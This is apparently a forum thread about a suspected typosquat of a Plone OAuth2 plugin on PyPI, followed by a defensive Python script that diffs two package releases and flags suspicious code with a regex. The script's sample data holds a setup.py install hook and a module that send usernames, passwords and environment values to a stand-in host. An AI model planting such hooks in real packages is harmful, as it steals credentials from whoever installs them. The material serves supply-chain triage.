pas.plugins.cauthomatic

Browsing PyPI today.

ALL: This is the officially maintained authomatic OAuth2 plugin:

But.... this came up in a search....

https://pypi.org/project/pas.plugins.cauthomatic/

Now, I'd hate to think there's a typosquatter out there trying to harvest credentials.... Probably an honest mistake, but could someone take a quick look at what this is?

Honestly, I would absolutely love to distract myself and spelunk both these plugins and discover a bad actor (or just boring mistakes) but I REALLY need to focus on my job. I'm sorry I'm bringing you guys work instead of solutions.

@jensens @ericof @thet @saily

I notified the security team some time ago about a similar issue with project/collective.saml2/: it links to someone's personal project on GitHub, not to GitHub - collective/collective.saml2 (Installation of SAML2 web single-sign-on for Plone (dm.zope.saml2)).

Is there any process for reporting abuse on PyPI? I am a bit lost on Help · PyPI and cannot find an explicit process to follow.

@jensens Security · PyPI (found the link in the footer)


Has anyone spelunked it, or diffed it against 1.1.2 of the approved plugin?
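For anyone who does want to do that diff, the following is an added triage script, not code from this thread or from either pas.plugins package. It assumes you have already unpacked the known-good sdist and the suspect sdist into two directories (for example with `pip download --no-binary :all: --no-deps pas.plugins.authomatic==1.1.2` and `tar -xzf`), compares every file by SHA-256, produces a unified diff of the files that changed, and flags added or changed files that contain install-time hooks or outbound-network and environment access, which is what a credential-harvesting typosquat would need. To run offline it constructs two small sample trees in a temp directory; those sample files and the suspicious patterns are illustrative assumptions, not the contents of the real packages.

```python
"""Diff a suspected typosquat sdist against the known-good release.

Added example. Both package trees are assumed to be already unpacked; the
sample trees built in build_sample_trees() are constructed for the demo and
are not the real pas.plugins packages.
"""
import difflib
import hashlib
import re
import tempfile
from pathlib import Path

# Crude indicators that deserve a manual look when they appear only in the
# suspect package: setup-time hooks, shelling out, outbound HTTP, env access,
# and the usual obfuscation helpers. This list is an assumption, not a standard.
SUSPICIOUS = re.compile(
    r"\bcmdclass\b|\bsubprocess\b|\burllib\.request\b|\brequests\.(?:post|get)\b"
    r"|\bos\.environ\b|\bbase64\.b64decode\b|\bexec\(|\beval\("
)


def file_hashes(root: Path) -> dict:
    """Map each regular file (relative POSIX path) under root to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file()
    }


def diff_trees(good: Path, suspect: Path) -> dict:
    """Compare two unpacked sdists: added/removed/changed files, unified diffs
    for changed files, and indicator hits in anything new or modified."""
    g, s = file_hashes(good), file_hashes(suspect)
    added = sorted(set(s) - set(g))
    removed = sorted(set(g) - set(s))
    changed = sorted(k for k in set(g) & set(s) if g[k] != s[k])

    unified = {}
    for rel in changed:
        old = (good / rel).read_text(errors="replace").splitlines(keepends=True)
        new = (suspect / rel).read_text(errors="replace").splitlines(keepends=True)
        unified[rel] = "".join(
            difflib.unified_diff(old, new, f"good/{rel}", f"suspect/{rel}")
        )

    flagged = {}
    for rel in added + changed:
        text = (suspect / rel).read_text(errors="replace")
        hits = sorted({m.group(0) for m in SUSPICIOUS.finditer(text)})
        if hits:
            flagged[rel] = hits

    return {
        "added": added,
        "removed": removed,
        "changed": changed,
        "unified": unified,
        "flagged": flagged,
    }


def build_sample_trees(base: Path):
    """Constructed sample data: a benign tree and a copy that adds an install
    hook plus an exfiltration module. Illustrative only."""
    good, suspect = base / "good", base / "suspect"
    for root in (good, suspect):
        (root / "src" / "pkg").mkdir(parents=True)
        (root / "src" / "pkg" / "__init__.py").write_text("VERSION = '1.1.2'\n")
        (root / "src" / "pkg" / "plugin.py").write_text(
            "def login(user, pw):\n    return check(user, pw)\n"
        )
    (good / "setup.py").write_text(
        "from setuptools import setup\nsetup(name='pkg')\n"
    )
    (suspect / "setup.py").write_text(
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        import urllib.request, os\n"
        "        urllib.request.urlopen('http://example.invalid/?u=' + os.environ.get('USER', ''))\n"
        "        install.run(self)\n"
        "setup(name='pkg', cmdclass={'install': PostInstall})\n"
    )
    (suspect / "src" / "pkg" / "exfil.py").write_text(
        "import os\nimport requests\n\n"
        "def ship(user, pw):\n"
        "    requests.post('http://example.invalid/c', data={'u': user, 'p': pw, 'h': os.environ.get('HOME')})\n"
    )
    return good, suspect


def run_demo() -> dict:
    """Build the constructed trees in a temp dir and return the diff report."""
    with tempfile.TemporaryDirectory() as tmp:
        good, suspect = build_sample_trees(Path(tmp))
        return diff_trees(good, suspect)


if __name__ == "__main__":
    report = run_demo()
    for key in ("added", "removed", "changed", "flagged"):
        print(f"{key}: {report[key]}")
    for rel, text in report["unified"].items():
        print(text)
```

On real input, point `diff_trees()` at the two unpacked directories instead of `run_demo()`. The interesting signal is usually not the line count of the diff but whether `setup.py`, `setup.cfg` or `pyproject.toml` differ at all, and whether any added file appears in `flagged`; an honest fork of the plugin should change neither.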

Does it even matter?